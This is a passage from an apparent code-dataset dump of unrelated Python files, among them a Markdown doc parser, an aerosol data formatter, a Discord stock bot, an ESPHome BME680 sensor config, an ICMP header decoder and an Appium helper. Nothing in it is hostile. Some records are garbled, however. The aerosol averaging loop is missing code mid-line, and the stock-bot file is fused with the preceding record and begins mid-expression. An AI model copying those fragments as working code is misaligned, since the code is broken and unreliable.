emphasis(,\\n{})'.format(text))\n return [MarkdownItem(None, SpanType.EMPHASIS, text)]\n def image(self, src, title, alt_text):\n raise NotImplementedError()\n def linebreak(self):\n raise NotImplementedError()\n def newline(self):\n if self.verbose:\n print('DocRenderer newline(,)')\n # return [MarkdownItem(None, SpanType.NEWLINE, \"\")]\n # Previous line would perserve the newline, which might in turn enable\n # perfect reconstruction of the input. Perfect reconstruction isn't\n # possible at time of writing, in some cases. 
For example, this list:\n #\n # - Just a list.\n #\n # Nothing to see.\n # - Middle of the list.\n #\n # The Doctor adds a blank link after 'Nothing to see', which seems\n # tidier and more consistent. So these newline occurrences aren't\n # preserved for now.\n return []\n def link(link, title, content):\n raise NotImplementedError()\n def strikethrough(self, text):\n raise NotImplementedError()\n def text(self, text):\n if self.verbose:\n print('DocRenderer text(,{}\\n{})'.format(len(text), text))\n return [MarkdownItem(None, SpanType.TEXT, text)]\n def inline_html(self, text):\n if self.verbose:\n print('DocRenderer inline_html(,\\n{})'.format(text))\n return [MarkdownItem(None, SpanType.INLINE_HTML, text)]\n\n #\n # Other overrides.\n #\n def placeholder(self):\n return []\n\nclass DocInlineGrammar(mistune.InlineGrammar):\n def __init__(self):\n super().__init__()\n # Mistune uses `match` not `search`, so it only consumes at the start.\n # It might be possible to fix it. Might. For now, doc: URIs can only be\n # at the start of a lexical doodad, or enclosed in brackets.\n pattern = self.text.pattern.replace('https?', '(?:http|https|doc)')\n self.text = re.compile(pattern)\n\nclass DocInlineLexer(mistune.InlineLexer):\n def enable_doc_uri(self):\n # add rules. Regular expressions here use the Python `r` raw string\n # syntax.\n self.rules.doc_uri = re.compile(\n r'(?:'\n r'(?Pdoc://\\S*)'\n r'|'\n r'(\\[)(\\s*)(?Pdoc://[^\\]\\s]*)(\\s*)(\\])'\n r')'\n )\n self.default_rules.insert(1, 'doc_uri')\n\n def output_doc_uri(self, match):\n return self.renderer.doc_uri(match.groupdict())\n\nclass MarkdownParser:\n # Not enjoying the implementation of docPath in this class. It's needed in\n # order to resolve relative doc: URIs but it's unclear how best to do it.\n\n # @property\n # def docPath(self):\n # return self._renderer.docPath\n # @docPath.setter\n # def docPath(self, docPath):\n # self._renderer.docPath = docPath\n # \n def __init__(self, docGetter):\n self._renderer = DocRenderer(docGetter)\n inlineLexer = DocInlineLexer(self._renderer)\n inlineLexer.enable_doc_uri()\n self._markdown = mistune.Markdown(\n renderer=self._renderer, inline=inlineLexer\n , rules=DocInlineGrammar())\n \n def get_markdown_items(self, docPath, *args, **kwargs):\n self._renderer.docPath = docPath\n # Uncomment the following line to get a lot of render dump.\n # self._renderer.verbose = True\n return self._markdown(*args, **kwargs)\n \n def read(self, iterator, sourcePath):\n for item in iterator:\n if isinstance(item, CommentBlock):\n try:\n item.markdownItems = self.get_markdown_items(\n sourcePath, \"\".join(item.get_texts()))\n except Exception as exception:\n raise exception.__class__(\n 'Error getting Markdown items. 
Block:{}.'.format(item)\n ) from exception\n yield item\n","sub_path":"doctor/doc_markdown.py","file_name":"doc_markdown.py","file_ext":"py","file_size_in_byte":17377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"351421035","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 10 10:30:44 2021\r\n\r\n@author: Anindita\r\n\"\"\"\r\n\r\ninp=input(\"Enter the string: \")\r\nwhile(len(inp)!=8):\r\n print('please enter 8 character string.')\r\n inp=input()\r\nk=''.join(format(ord(i), '08b') for i in inp)\r\narr1=[]\r\nn=len(k)\r\nfor i in range(n):\r\n if((i+1)%8!=0):\r\n arr1.append(k[i])\r\n \r\nprint(arr1) \r\nprint(\"Length of string after discarding:\",len(arr1))","sub_path":"Advance Communication and TCP_IP/1_des.py","file_name":"1_des.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"188617685","text":"#!/usr/bin/python3.2\n#prepare files from Asmi dataset\n\npath = '/lustre/storeB/project/aerocom/aerocom1/AEROCOM_OBSDATA/Export/GAW_ACTRIS/'\nparam = 'NC'\n\n#required modules\nimport numpy as np\nfrom scipy.stats import nanmean\nfrom scipy.stats import kendalltau\nfrom scipy.stats.mstats import theilslopes\nimport time\nfrom datetime import datetime\n\n#Stations-definition reading file\nimport csv\nreadCSV = csv.reader(open(path+'/'+'Stations.txt'), delimiter='\\t')\n#init\ni = 0\ncode, station, lat, lon = [], [], [], []\nfor row in readCSV:\n\tif(i>=1):\n\t\tcode.append(row[0])\n\t\tstation.append(row[1])\n\t\tlat.append(row[2])\n\t\tlon.append(row[3])\n\ti=i+1\t\n\n#list of files for parameter\nimport glob\nlistfile=sorted(glob.glob(path + '/' + \"*.dat\"))\n# * * * * * * * * * * * * * * * * * * * * * * * *\n#reduce list of code - coo to list of stations available for parameter\ncodeok, stationok, latok, lonok, = [], [], [], []\ni=0\nfor c in code:\n\tfor f in listfile:\n\t\tif (c in f):\n\t\t\tcodeok.append(code[i])\n\t\t\tstationok.append(station[i])\n\t\t\tlatok.append(lat[i])\n\t\t\tlonok.append(lon[i])\n\ti = i + 1\n# * * * * * * * * * * * * * * * * * * * * * * * *\n\n#for the different sites, create formatted file\ni=0\nfor f in listfile:\n\tprint('****' + codeok[i]+' - '+f + '****')\n\t# initialization\n\tods, year, month, day, data = [], [], [], [], []\n\tfrom datetime import date\n\treadCSV = csv.reader(open(f), delimiter='\\t')\n\tfor row in readCSV:\n\t\tif (codeok[i]=='DMPSMPZ' or codeok[i]=='DMPSPAL' or codeok[i]=='DMPSSMR' or codeok[i]=='DMPSVAR' or codeok[i]=='DMPSVHL'):\n\t\t\ttim, dat, dat2, dat3, flag=row[0].split()\n\t\t\tif (float(flag)==1):\n\t\t\t\ttim=int(np.floor(float(tim)))\n\t\t\t\ttime=date.fromordinal(tim)\n\t\t\t\tt=time.timetuple()\n\t\t\t\tyear.append(t[0])\n\t\t\t\tmonth.append(t[1])\n\t\t\t\tday.append(t[2])\n\t\t\t\tdata.append(dat)\n\t\t\t\tods.append(tim)\n\t\telse:\n\t\t\ttim, dat, flag=row[0].split()\n\t\t\tif (float(flag)==1):\n\t\t\t\ttim=int(np.floor(float(tim)))\n\t\t\t\ttime=date.fromordinal(tim)\n\t\t\t\tt=time.timetuple()\n\t\t\t\tyear.append(t[0])\n\t\t\t\tmonth.append(t[1])\n\t\t\t\tday.append(t[2])\n\t\t\t\tdata.append(dat)\n\t\t\t\tods.append(tim)\n\t\n\n\t#unique ordinal days\n\todays,uidx=np.unique(ods,return_index=True)\n\n\t#for each unique oday, average data\n\tj=0\n\tokyear, okmonth, okday, okdata = [], [], [], []\n\tfor uod in odays: # for the unique odays\n\t\tavg_data=[]\n\t\tk=uidx[j] #start from this index\n\t\twhile(ods[k]==uod and 
k+10:\n\t\t\tokdata.append(sum(avg_data)/len(avg_data))\n\t\t\tokday.append(day[k-1])\n\t\t\tokmonth.append(month[k-1])\n\t\t\tokyear.append(year[k-1])\n\t\tj=j+1\n\n\t#write of the file\n\toutfile=param+'_daily_' + stationok[i] + '.txt'\n\tf = open(path + '/' + outfile, 'w')\n\tprint(path + '/' + outfile)\n\n\t#header \n\tf.write('12'+'\\n')\n\tf.write('Latitude:'+'\\t'+latok[i]+'\\n')\n\tf.write('Longitude:'+'\\t'+lonok[i]+'\\n')\n\tf.write('Altitude:'+'\\t'+str(np.nan)+'\\n')\n\tf.write('Station name:'+'\\t'+stationok[i]+'\\n')\n\tf.write('\\n')\n\tf.write('\\n')\n\tf.write('\\n')\n\tf.write('\\n')\n\tf.write('\\n')\n\tf.write('datestring'+'\\t'+'year'+'\\t'+'month'+'\\t'+'day'+'\\t'+'hour'+'\\t'+'minute'+'\\t'+'second'+'\\t'+'value'+'\\n')\n\tk=0\n\twhile k= so.get(stock)[2]:\n stockOwners.append(name)\n # print(\" stock {}: {}\".format(k, v))\n\n # get time left\n if stock == \"tcb\":\n timeLeft[name] = req.get('city_bank', dict({})).get(\"time_left\", 0)\n elif stock == \"wssb\":\n timeLeft[name] = req.get('education_timeleft', 0)\n\n return timeLeft, stockOwners\n\n @commands.command()\n async def wssb(self, ctx):\n \"\"\"Display information for the WSSB sharing group.\"\"\"\n\n timeLeft, stockOwners = await self.get_times(ctx, stock=\"wssb\")\n if len(timeLeft):\n lst = \"{: <15} | {} | {} \\n\".format(\"NAME\", \"EDU TIME LEFT\", \"WSSB\")\n lst += \"-\" * (len(lst) - 1) + \"\\n\"\n\n for k, v in sorted(timeLeft.items(), key=lambda x: x[1]):\n lst += \"{: <15} | {} | {} \\n\".format(k, fmt.s_to_dhm(v), \"x\" if k in stockOwners else \" \")\n\n await ctx.send(f\"Here you go {ctx.author.display_name}, the list of education time left and WSSB owners:\\n```\\n{lst}```\")\n\n @commands.command()\n async def tcb(self, ctx):\n \"\"\"Display information for the TCB sharing group.\"\"\"\n\n timeLeft, stockOwners = await self.get_times(ctx, stock=\"tcb\")\n\n if len(timeLeft):\n lst = \"{: <15} | {} | {} \\n\".format(\"NAME\", \"INV TIME LEFT\", \"TCB\")\n lst += \"-\" * (len(lst) - 1) + \"\\n\"\n\n for k, v in sorted(timeLeft.items(), key=lambda x: x[1]):\n lst += \"{: <15} | {} | {} \\n\".format(k, fmt.s_to_dhm(v), \"x\" if k in stockOwners else \" \")\n\n await ctx.send(f\"Here you go {ctx.author.display_name}, the list of investment time left and TCB owners:\\n```\\n{lst}```\")\n","sub_path":"cogs/stocks.py","file_name":"stocks.py","file_ext":"py","file_size_in_byte":7704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483778363","text":"# In order for the following code to run, couple dependent libraries\n# need to be installed.\n# Do command:\n# sudo pip install pypng\n# sudo apt-get install libpng-dev\n# sudo apt-get install zlib1g-dev\nimport pyqrcode\nimport sys\nfrom PIL import Image\nqr = pyqrcode.create(sys.argv[1])\nqr.png(sys.argv[2], scale=6)\nim = Image.open(sys.argv[2])\nrgb_im = im.convert('RGB')\nrgb_im.save(sys.argv[2])\ndef generate_qrcode(input_string,out_filename):\n code = pyqrcode.create(input_string)\n code.png(out_filename, scale = 6)\n im = Image.open(out_filename)\n rgb_im = im.convert('RGB')\n rgb_im.save(out_filename)\n","sub_path":"code/Computer Vision/generate_qrcode.py","file_name":"generate_qrcode.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"423708132","text":"\"\"\"\n Testing perfomance on dataset provided by Kiritchenko et al (Exact)\n\n PMIDS_INFO --> {pmid: (True_N, Pred_N), 
...}\n\"\"\"\n\nimport csv\nimport os\n\ncwd = os.getcwd()\n\n\nPMIDS = []\nPMIDS_INFO = {}\n\ndef get_true():\n \"\"\"\n True data\n \"\"\"\n path = os.path.join(cwd, 'exact_N_true.csv')\n with open(path, \"r\") as csv_file:\n csv_reader = csv.reader(csv_file)\n for row in csv_reader:\n pmid = row[0]\n N = row[1]\n if pmid.isnumeric() and N.isnumeric():\n PMIDS.append(pmid)\n PMIDS_INFO[pmid] = N\n csv_file.close()\n print(len(PMIDS_INFO))\n\ndef get_predicted():\n path = os.path.join(cwd, 'output', 'evidence_table.csv')\n with open(path, \"r\") as csv_file:\n csv_reader = csv.reader(csv_file)\n for row in csv_reader:\n pmid = row[0]\n pred_n = row[1]\n if pmid.isnumeric() and (pmid in PMIDS):\n true_n = PMIDS_INFO[pmid]\n PMIDS_INFO[pmid] = (true_n, pred_n)\n csv_file.close()\n\n print(len(PMIDS_INFO))\n\nget_true()\nget_predicted()\n\ncorrect = 0\npredictions_made = 0\nfor key, value in PMIDS_INFO.items():\n if value[1].isnumeric():\n predictions_made += 1\n if value[0] == value[1]:\n correct += 1\n\nprecision = correct / predictions_made\nrecall = correct / len(PMIDS_INFO)\nf1 = 2*((precision*recall)/(precision+recall))\n\nprint('\\nN:', len(PMIDS))\n\nprint('Sample Size extraction from {} articles\\n'.format(len(PMIDS)))\n\nprint('System developed by Kiritchenko et al: \\n\\tRecall:\\t 0.56 ')\n\nprint('\\nbi-LSTM-CRF adapted for Sample Size extraction:')\nprint('\\tPrecision: {:03.2f}'.format(precision))\nprint('\\tRecall:\\t {:03.2f}'.format(recall))\nprint('\\tF1:\\t {:03.2f}'.format(f1))\n\n\n\n\n","sub_path":"lstm/exact/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"337774477","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @datetime:2019/1/15 18:53\n\n\"\"\"\nGiven a positive integer n, break it into the sum of at least two positive integers and maximize the product of those integers.\n Return the maximum product you can get.\n\nExample 1:\n\nInput: 2\nOutput: 1\nExplanation: 2 = 1 + 1, 1 × 1 = 1.\nExample 2:\n\nInput: 10\nOutput: 36\nExplanation: 10 = 3 + 3 + 4, 3 × 3 × 4 = 36.\nNote: You may assume that n is not less than 2 and not larger than 58.\n\"\"\"\n\n\nclass Solution:\n def integerBreak(self, n):\n \"\"\"\n 将n进行分割(至少分割两部分), 可以获得的最大乘积\n :type n: int\n :rtype: int\n \"\"\"\n if n == 1:\n return 1\n res = -1\n for i in range(1, n):\n res = max(res, i * (n - 1), i * self.integerBreak(n - 1))\n return res\n\n def integerBreakV1(self, n):\n \"\"\"\n 将n进行分割(至少分割两部分), 可以获得的最大乘积\n :type n: int\n :rtype: int\n \"\"\"\n mem = [-1 for _ in range(n + 1)]\n if n == 1:\n return 1\n if mem[n] != -1:\n return mem[n]\n\n res = -1\n for i in range(1, n):\n res = max(res, i * (n - 1), i * self.integerBreak(n - 1))\n mem[n] = res\n return res\n\n def integerBreakV2(self, n):\n \"\"\"\n 将n进行分割(至少分割两部分), 可以获得的最大乘积\n :type n: int\n :rtype: int\n \"\"\"\n # DP\n mem = [-1 for _ in range(n + 1)] # mem[i] 表示将数字i分割(至少分割成两部分)后得到的最大乘积\n mem[1] = 1\n for i in range(2, n + 1):\n # 求解mem[i]\n for j in range(1, i):\n # j + (i-j) 两个部分\n mem[i] = max(mem[i], j * (i - j), j * mem[i - j])\n return mem[n]\n","sub_path":"leetcode/343. Integer Break.py","file_name":"343. 
Integer Break.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"602696532","text":"import voluptuous as vol\n\nimport esphomeyaml.config_validation as cv\nfrom esphomeyaml import core\nfrom esphomeyaml.components import sensor\nfrom esphomeyaml.const import CONF_ADDRESS, CONF_GAS_RESISTANCE, CONF_HUMIDITY, CONF_IIR_FILTER, \\\n CONF_MAKE_ID, CONF_NAME, CONF_OVERSAMPLING, CONF_PRESSURE, CONF_TEMPERATURE, \\\n CONF_UPDATE_INTERVAL, CONF_HEATER, CONF_DURATION\nfrom esphomeyaml.helpers import App, Application, add, variable\n\nDEPENDENCIES = ['i2c']\n\nOVERSAMPLING_OPTIONS = {\n 'NONE': sensor.sensor_ns.BME680_OVERSAMPLING_NONE,\n '1X': sensor.sensor_ns.BME680_OVERSAMPLING_1X,\n '2X': sensor.sensor_ns.BME680_OVERSAMPLING_2X,\n '4X': sensor.sensor_ns.BME680_OVERSAMPLING_4X,\n '8X': sensor.sensor_ns.BME680_OVERSAMPLING_8X,\n '16X': sensor.sensor_ns.BME680_OVERSAMPLING_16X,\n}\n\nIIR_FILTER_OPTIONS = {\n 'OFF': sensor.sensor_ns.BME680_IIR_FILTER_OFF,\n '1X': sensor.sensor_ns.BME680_IIR_FILTER_1X,\n '3X': sensor.sensor_ns.BME680_IIR_FILTER_3X,\n '7X': sensor.sensor_ns.BME680_IIR_FILTER_7X,\n '15X': sensor.sensor_ns.BME680_IIR_FILTER_15X,\n '31X': sensor.sensor_ns.BME680_IIR_FILTER_31X,\n '63X': sensor.sensor_ns.BME680_IIR_FILTER_63X,\n '127X': sensor.sensor_ns.BME680_IIR_FILTER_127X,\n}\n\nBME680_OVERSAMPLING_SENSOR_SCHEMA = sensor.SENSOR_SCHEMA.extend({\n vol.Optional(CONF_OVERSAMPLING): vol.All(vol.Upper, cv.one_of(*OVERSAMPLING_OPTIONS)),\n})\n\nMakeBME680Sensor = Application.MakeBME680Sensor\n\nPLATFORM_SCHEMA = sensor.PLATFORM_SCHEMA.extend({\n cv.GenerateID(CONF_MAKE_ID): cv.declare_variable_id(MakeBME680Sensor),\n vol.Optional(CONF_ADDRESS, default=0x76): cv.i2c_address,\n vol.Required(CONF_TEMPERATURE): cv.nameable(BME680_OVERSAMPLING_SENSOR_SCHEMA),\n vol.Required(CONF_PRESSURE): cv.nameable(BME680_OVERSAMPLING_SENSOR_SCHEMA),\n vol.Required(CONF_HUMIDITY): cv.nameable(BME680_OVERSAMPLING_SENSOR_SCHEMA),\n vol.Required(CONF_GAS_RESISTANCE): cv.nameable(sensor.SENSOR_SCHEMA),\n vol.Optional(CONF_IIR_FILTER): vol.All(vol.Upper, cv.one_of(*IIR_FILTER_OPTIONS)),\n vol.Optional(CONF_HEATER): vol.Any(None, vol.All(vol.Schema({\n vol.Optional(CONF_TEMPERATURE, default=320): vol.All(vol.Coerce(int), vol.Range(200, 400)),\n vol.Optional(CONF_DURATION, default='150ms'): vol.All(\n cv.positive_time_period_milliseconds, vol.Range(max=core.TimePeriod(milliseconds=4032)))\n }, cv.has_at_least_one_key(CONF_TEMPERATURE, CONF_DURATION)))),\n vol.Optional(CONF_UPDATE_INTERVAL): cv.update_interval,\n})\n\n\ndef to_code(config):\n rhs = App.make_bme680_sensor(config[CONF_TEMPERATURE][CONF_NAME],\n config[CONF_PRESSURE][CONF_NAME],\n config[CONF_HUMIDITY][CONF_NAME],\n config[CONF_GAS_RESISTANCE][CONF_NAME],\n config[CONF_ADDRESS],\n config.get(CONF_UPDATE_INTERVAL))\n make = variable(config[CONF_MAKE_ID], rhs)\n bme680 = make.Pbme680\n if CONF_OVERSAMPLING in config[CONF_TEMPERATURE]:\n constant = OVERSAMPLING_OPTIONS[config[CONF_TEMPERATURE][CONF_OVERSAMPLING]]\n add(bme680.set_temperature_oversampling(constant))\n if CONF_OVERSAMPLING in config[CONF_PRESSURE]:\n constant = OVERSAMPLING_OPTIONS[config[CONF_PRESSURE][CONF_OVERSAMPLING]]\n add(bme680.set_pressure_oversampling(constant))\n if CONF_OVERSAMPLING in config[CONF_HUMIDITY]:\n constant = OVERSAMPLING_OPTIONS[config[CONF_HUMIDITY][CONF_OVERSAMPLING]]\n add(bme680.set_humidity_oversampling(constant))\n if CONF_IIR_FILTER in config:\n constant = 
IIR_FILTER_OPTIONS[config[CONF_IIR_FILTER]]\n add(bme680.set_iir_filter(constant))\n if CONF_HEATER in config:\n conf = config[CONF_HEATER]\n if not conf:\n add(bme680.set_heater(0, 0))\n else:\n add(bme680.set_heater(conf[CONF_TEMPERATURE], conf[CONF_DURATION]))\n\n sensor.setup_sensor(bme680.Pget_temperature_sensor(), make.Pmqtt_temperature,\n config[CONF_TEMPERATURE])\n sensor.setup_sensor(bme680.Pget_pressure_sensor(), make.Pmqtt_pressure,\n config[CONF_PRESSURE])\n sensor.setup_sensor(bme680.Pget_humidity_sensor(), make.Pmqtt_humidity,\n config[CONF_HUMIDITY])\n sensor.setup_sensor(bme680.Pget_gas_resistance_sensor(), make.Pmqtt_gas_resistance,\n config[CONF_GAS_RESISTANCE])\n\n\nBUILD_FLAGS = '-DUSE_BME680'\n","sub_path":"esphomeyaml/components/sensor/bme680.py","file_name":"bme680.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"80981502","text":"#!/usr/bin/env python\n# -*- encoding: UTF-8 -*-\n\n\n\nimport qi\nimport argparse\nimport sys\nimport time\nimport math\n\n\n\n\n\ndef main(session):\n\n\n motion_service = session.service(\"ALMotion\")\n \n motion_service.setStiffnesses(\"LArm\", 1.0)\n motion_service.setStiffnesses(\"RArm\", 1.0)\n motion_service.setMoveArmsEnabled(False,False) \n\n \n\n\n names = [\"LShoulderPitch\",\"RShoulderPitch\"] \n angles = [math.radians(10),math.radians(10)]\n fractionMaxSpeed = 0.2\n motion_service.setAngles(names, angles, fractionMaxSpeed)\n time.sleep(5)\n\n names = [\"LElbowRoll\",\"RElbowRoll\"] \n angles = [math.radians(-60),math.radians(60)]\n fractionMaxSpeed = 0.2\n motion_service.setAngles(names, angles, fractionMaxSpeed)\n time.sleep(5)\n\n names = [\"LShoulderRoll\",\"RShoulderRoll\"] \n angles = [math.radians(40),math.radians(-40)]\n fractionMaxSpeed = 0.2\n motion_service.setAngles(names, angles, fractionMaxSpeed)\n time.sleep(5)\n\n\n names = [\"LElbowYaw\",\"RElbowYaw\"] \n angles = [math.radians(0),math.radians(0)]\n fractionMaxSpeed = 0.2\n motion_service.setAngles(names, angles, fractionMaxSpeed)\n time.sleep(5)\n\n names = [\"LWristYaw\",\"RWristYaw\"] \n angles = [math.radians(-90),math.radians(90)]\n fractionMaxSpeed = 0.2\n motion_service.setAngles(names, angles, fractionMaxSpeed)\n time.sleep(5)\n \n \n\n \n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", type=str, default=\"172.18.33.122\",\n help=\"Robot IP address. On robot or Local Naoqi: use '172.18.33.122'.\")\n parser.add_argument(\"--port\", type=int, default=9559,\n help=\"Naoqi port number\")\n\n args = parser.parse_args()\n session = qi.Session()\n \n\n try:\n session.connect(\"tcp://\" + args.ip + \":\" + str(args.port))\n except RuntimeError:\n print (\"Can't connect to Naoqi at ip \\\"\" + args.ip + \"\\\" on port \" + str(args.port) +\".\\n\"\n \"Please check your script arguments. 
Run with -h option for help.\")\n sys.exit(1)\n main(session)\n","sub_path":"importantPythonScripts/prepararTomarBotella.py","file_name":"prepararTomarBotella.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"272176122","text":"import os\n\n\ndef getUploadCommand(basedir, prefix, suffix):\n\n listDir = filter(os.path.isdir, os.listdir(basedir))\n\n command = []\n for subdir in listDir:\n command.append('cd {0}'.format(basedir))\n command.append('tar -cf {1}-{0}-{2}.tar'.format(subdir, prefix, suffix))\n command.append('gzip {1}-{0}-{2}.tar'.format(subdir, prefix, suffix))\n command.append(\n 'gsutil cp {1}-{0}-{2}.tar.gz gs://mortner-store/'.format(subdir, prefix, suffix))\n\n ';'.join(command)\n\n return command\n","sub_path":"templates/compressAndUploadFiles.py","file_name":"compressAndUploadFiles.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"28390966","text":"import socket, sys, time, platform, struct\nfrom PyQt4 import QtGui, QtCore\n\ndef icmp(self, packet, extractedAttIndex, printKey):\n\t\t# Header lengths.\n\t\tethHeaderLength = 14\n\t\tip_hlen = 20\n\t\ticmpHeaderLength = 8\n\t\t\n\t\t# Get ICMP header using begin and end.\n\t\t# Specific Linux and Windows calibration is needed.\n\t\tif self.os == self.windows:\n\t\t\tbegin = ip_hlen\n\t\t\tend = begin + icmpHeaderLength\n\t\ticmpHeader = packet[begin:end]\n\n\t\t# Unpack the header because it originally in hex.\n\t\t# The regular expression helps unpack the header.\n\t\t# ! signifies we are unpacking a network endian.\n\t\t# B signifies we are unpacking an integer of size 1 byte.\n\t\t# H signifies we are unpacking an integer of size 2 bytes.\n\t\t# L signifies we are unpacking a long of size 4 bytes.\n\t\ticmpHeaderUnpacked = struct.unpack('!BBHL', icmpHeader)\n\n\t\t# The first B is 1 byte and contains the type.\n\t\ticmpType = icmpHeaderUnpacked[0]\n\n\t\t# The second B is 1 byte and contains the code.\n\t\ticmpCode = icmpHeaderUnpacked[1]\n\n\t\t# The first H is 2 bytes and contains the checksum.\n\t\ticmpChecksum = icmpHeaderUnpacked[2]\n\n\t\t# Check if the type is 1 or 8, if so, unpack the identifier and sequence number.\n\t\tif (icmpType == 0) or (icmpType == 8):\n\t\t\t# The first L is 4 bytes and contains the rest of the header.\n\t\t\ticmpIdentifier = icmpHeaderUnpacked[3] >> 16\n\t\t\ticmpSeqNumber = icmpHeaderUnpacked[3] & 0xFFFF\n\t\t\n\t\t# Check if the print key is True.\n\t\t# If true, header information will be printed.\n\t\t# \tCheck if the user selected extracted attribute index is 0.\n\t\t#\tIf true, all attributes will be printed.\n\t\t#\tIf false, the attribute the user selected extracted attribute index corresponds to will be printed.\n\t\t# If false, the attribute the user selected attribute index corresponds to will be returned.\n\t\tif printKey == True:\n\t\t\tif (icmpType == 0) or (icmpType == 8):\n\t\t\t\t# Print ICMP Header\n\t\t\t\t# Some segments of the header are switched back to hex form because that\n\t\t\t\t# \tis the format wireshark has it.\n\t\t\t\tself.unpackedInfo.append('\\n********************\\n******* ICMP *******\\n********************')\n\t\t\t\t\n\t\t\t\tif (extractedAttIndex == 1) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Type: ' + str(icmpType))\n\t\t\t\tif (extractedAttIndex == 2) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Code: ' + 
str(icmpCode))\n\t\t\t\tif (extractedAttIndex == 3) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Checksum: ' + format(icmpChecksum, '#04X'))\n\t\t\t\tif (extractedAttIndex == 4) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Identifier: ' + str(icmpIdentifier))\n\t\t\t\tif (extractedAttIndex == 5) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Sequence Number: ' + str(icmpSeqNumber))\n\t\t\telse:\n\t\t\t\tself.unpackedInfo.append('\\n********************\\n******* ICMP *******\\n********************')\n\t\t\t\t\n\t\t\t\tif (extractedAttIndex == 1) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Type: ' + str(icmpType))\n\t\t\t\tif (extractedAttIndex == 2) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Code: ' + str(icmpCode))\n\t\t\t\tif (extractedAttIndex == 3) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Checksum: ' + format(icmpChecksum, '#04X'))\n\t\t\t\tif (extractedAttIndex == 4) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Attribute not available.')\n\t\t\t\tif (extractedAttIndex == 5) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Attribute not available.')\n\t\t\t\t\t\n\t\t\t# Separator\t\n\t\t\tself.unpackedInfo.append('\\n----------------------------------------')\n\t\telse:\n\t\t\tif (icmpType == 0) or (icmpType == 8):\n\t\t\t\tif (extractedAttIndex == 1):\n\t\t\t\t\treturn str(icmpType)\n\t\t\t\tif (extractedAttIndex == 2):\n\t\t\t\t\treturn str(icmpCode)\n\t\t\t\tif (extractedAttIndex == 3):\n\t\t\t\t\treturn format(icmpChecksum, '#04X')\n\t\t\t\tif (extractedAttIndex == 4):\n\t\t\t\t\treturn str(icmpIdentifier)\n\t\t\t\tif (extractedAttIndex == 5):\n\t\t\t\t\treturn str(icmpSeqNumber)\n\t\t\telse:\t\t\t\n\t\t\t\tif (extractedAttIndex == 1):\n\t\t\t\t\treturn str(icmpType)\n\t\t\t\tif (extractedAttIndex == 2):\n\t\t\t\t\treturn str(icmpCode)\n\t\t\t\tif (extractedAttIndex == 3):\n\t\t\t\t\treturn format(icmpChecksum, '#04X')\n\t\t\t\tif (extractedAttIndex == 4):\n\t\t\t\t\treturn 'Attribute not available.'\n\t\t\t\tif (extractedAttIndex == 5):\n\t\t\t\t\treturn 'Attribute not available.'","sub_path":"icmp.py","file_name":"icmp.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"614387834","text":"# coidng=utf-8\nimport os, time\nfrom appium import webdriver\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom app.common.Swipe_swipe import *\nfrom app.page import get_yaml\npage_loc = get_yaml.LonginPage()\nmin_loc = get_yaml.MinePage()\nzhuce_loc = get_yaml.ZhucePage()\nclass Fengzhuang(object):\n def lunachapp(self):\n desired_caps = {\n 'platformName': 'Android',\n 'deviceName': 'X2P5T16114009484',\n 'platformVersion': '5.1',\n 'appPackage': 'gz.lifesense.weidong.qa',\n 'appActivity': 'gz.lifesense.weidong.ui.activity.main.LaunchActivity',\n 'unicodeKeyboard': True,\n 'resetKeyboard': True,\n # 'automationName': 'Uiautomator2'\n }\n self.dr = webdriver.Remote(\"http://127.0.0.1:4723/wd/hub\", desired_caps)\n time.sleep(3)\n return self.dr\n\n def find_element(self, locator,timeout=3):\n element = WebDriverWait(self.dr, timeout, 0.5).until(EC.presence_of_element_located(locator))\n return element\n\n def find_elements(self, locator,timeout=3):\n elements = WebDriverWait(self.dr, timeout, 0.5).until(EC.presence_of_all_elements_located(locator))\n 
